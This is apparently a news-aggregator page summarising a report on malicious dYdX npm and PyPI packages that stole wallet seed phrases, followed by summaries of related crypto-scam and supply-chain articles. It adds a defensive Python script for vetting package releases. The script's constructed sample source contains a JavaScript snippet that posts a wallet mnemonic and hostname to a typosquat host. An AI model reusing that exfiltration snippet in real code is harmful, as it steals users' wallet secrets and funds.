Technology

Malicious packages for dYdX cryptocurrency exchange empty user wallets

Source: Ars Technica

Published

TL;DR (AI generated)

Compromised releases of packages for the dYdX cryptocurrency exchange, published to both npm and PyPI, stole wallet credentials and backdoored the machines that installed them. Any application that pulled in one of the malicious versions was exposed to complete wallet compromise and irreversible theft of funds. Several versions across both registries were affected. The malware harvested seed phrases together with device fingerprints, which let the attackers tie a victim's machine to later compromises. The stolen data was exfiltrated to a typosquatted domain that mimicked the legitimate dYdX service.
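The pattern described above (a legitimate package name shipping a poisoned release, an install-time hook, a lookalike exfiltration host, and code that touches the seed phrase) is what a pre-install review should catch. The following is an added example, not code from the Ars Technica article or from dYdX: an offline Python review of a package release that flags npm lifecycle hooks, outbound hostnames that typosquat or impersonate an allowlisted service host, and code that handles wallet secrets. The manifest, the source excerpt, the allowlisted host dydx.exchange and every lookalike hostname in it are constructed for illustration and are not indicators from the real incident.

```python
"""Offline pre-install review of a package release (example code, not the
article's or dYdX's own).  Flags install-time lifecycle hooks, outbound
hostnames that imitate a legitimate service, and code touching wallet secrets."""
import json
import re

# npm runs these automatically on install; the usual place for a dropper.
NPM_LIFECYCLE = {"preinstall", "install", "postinstall", "prepare"}

# Assumed legitimate service host (allowlist); its subdomains are trusted too.
LEGIT_HOSTS = ["dydx.exchange"]

HOST_RE = re.compile(r"https?://([a-z0-9][a-z0-9.-]*\.[a-z]{2,})", re.I)
SECRET_RE = re.compile(r"\b(mnemonic|seed ?phrase|private ?key|keystore)\b", re.I)

# Constructed sample manifest: a benign-looking release that gained a postinstall hook.
SAMPLE_PACKAGE_JSON = """{
  "name": "example-client",
  "version": "1.2.3",
  "scripts": { "build": "tsc", "postinstall": "node scripts/setup.js" }
}"""

# Constructed sample source, not the real malware: the legitimate API host sits
# next to a typosquat, a brand-in-label impersonation and an unrelated host,
# and the connect handler posts the mnemonic plus a host fingerprint.
SAMPLE_SOURCE = """
const os = require("os");
const API = "https://api.dydx.exchange/v4";
const SINK = "https://dyxd.exchange/v4";
const MIRROR = "https://dydx-exchange.example/collect";
const REGISTRY = "https://registry.npmjs.org/-/ping";
async function onConnect(wallet) {
  const body = JSON.stringify({ mnemonic: wallet.mnemonic, fp: os.hostname() });
  await fetch(SINK, { method: "POST", body });
}
"""


def levenshtein(a: str, b: str) -> int:
    """Edit distance (insert/delete/substitute); small values mean a typosquat."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable_label(host: str) -> str:
    """Second-level label, e.g. 'dydx' for api.dydx.exchange.  Crude on purpose:
    it does not know multi-label public suffixes such as co.uk."""
    parts = host.lower().split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def is_legit(host: str, legit_hosts) -> bool:
    host = host.lower()
    return any(host == lh or host.endswith("." + lh) for lh in legit_hosts)


def classify_host(host: str, legit_hosts, max_distance: int = 2) -> str:
    """Return 'legit', 'typosquat', 'impersonation' or 'unrelated'."""
    if is_legit(host, legit_hosts):
        return "legit"
    label = registrable_label(host)
    for lh in legit_hosts:
        brand = registrable_label(lh)
        if levenshtein(label, brand) <= max_distance:
            return "typosquat"          # e.g. dyxd vs dydx
        if brand in label:
            return "impersonation"      # e.g. dydx-exchange vs dydx
    return "unrelated"


def find_install_hooks(package_json: str) -> dict:
    """Lifecycle scripts that run without any call from the importing app."""
    scripts = json.loads(package_json).get("scripts", {})
    return {k: v for k, v in scripts.items() if k in NPM_LIFECYCLE}


def review_release(package_json: str, source: str, legit_hosts) -> dict:
    """Combine the three checks into one report for a release under review."""
    hosts = sorted({m.group(1).lower() for m in HOST_RE.finditer(source)})
    verdicts = {h: classify_host(h, legit_hosts) for h in hosts}
    return {
        "install_hooks": find_install_hooks(package_json),
        "suspicious_hosts": {h: v for h, v in verdicts.items()
                             if v in ("typosquat", "impersonation")},
        "handles_secrets": bool(SECRET_RE.search(source)),
    }


if __name__ == "__main__":
    print(json.dumps(review_release(SAMPLE_PACKAGE_JSON, SAMPLE_SOURCE, LEGIT_HOSTS), indent=2))
```

Run against the constructed release, the report lists the postinstall hook, flags dyxd.exchange as a typosquat and dydx-exchange.example as an impersonation while leaving api.dydx.exchange and registry.npmjs.org alone, and notes that the code handles a mnemonic. None of the three findings is proof of compromise on its own; a new lifecycle hook, a new outbound host and secret handling appearing together in a point release is the combination worth blocking until someone has diffed the tarball against the previous version.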

Similar Articles

Tennessee bans crypto ATMs that have become 'payment portal of choice for scammers' — second state to restrict machines after Indiana

Tennessee has joined Indiana in banning cryptocurrency ATMs due to their association with scams and fraud, with Minnesota considering similar legislation. The FBI has warned of significant losses due to fraud involving these machines. Despite not being inherently fraudulent, cybercriminals exploit crypto ATMs to steal funds from victims who mistakenly believe they offer the same protections as banks. Law enforcement actions against operators like Bitcoin Depot and Athena Bitcoin highlight the growing concerns around crypto ATM scams, leading to increased regulatory measures across states to protect consumers.

Tom's Hardware
Techie buys fake Ledger Nano S+ hardware crypto wallet and almost falls for phishing — a convincing clone would have caught newbies unaware

Brazilian cybersecurity professional Joje Mendes nearly fell victim to a sophisticated hardware-and-software phishing attack involving a fake Ledger Nano S+ cryptocurrency wallet purchased from a Chinese marketplace. Despite the device being priced similarly to a legitimate one, Mendes discovered it was a counterfeit upon arrival, thanks to Ledger's software verification. Upon dissecting the device, Mendes found it contained an ESP32-S3 SoC and was designed to harvest data through a fake Ledger app, leading unsuspecting users to a malicious website for downloading harmful apps. Mendes reported the incident to Ledger and plans to investigate further, emphasizing the importance of purchasing security devices directly from manufacturers or authorized sellers.

Tom's Hardware
US-sanctioned currency exchange says $15 million heist done by "unfriendly states"

Grinex, a US-sanctioned cryptocurrency exchange in Kyrgyzstan, announced a $15 million heist allegedly orchestrated by hackers linked to "unfriendly states." TRM researchers confirmed the theft, noting more drained addresses than initially reported by Grinex. The attack targeted Russian users, with Grinex attributing it to a coordinated effort to harm Russia's financial sovereignty. TokenSpot, another Kyrgyzstan-based exchange, was also breached, with both exchanges becoming inoperable on Wednesday. The US Treasury Department had previously sanctioned Grinex's predecessor, Garantex, for facilitating ransomware actors and cybercriminals.

Ars Technica
HWMonitor and CPU-Z developer CPUID breached by unknown attackers — cyberattack forced users to download malware instead of valid apps for six hours

Unknown attackers breached the website of CPUID, the developer of HWMonitor and CPU-Z, serving users infected files instead of legitimate ones for six hours. The malware aimed to steal browser credentials, particularly from Google Chrome. The breach was fixed, and CPUID's original files were not compromised. Supply chain attacks like this have become more common, with popular tech tools being targeted to distribute malware. Users who downloaded the infected files may have had their systems compromised.

Tom's Hardware
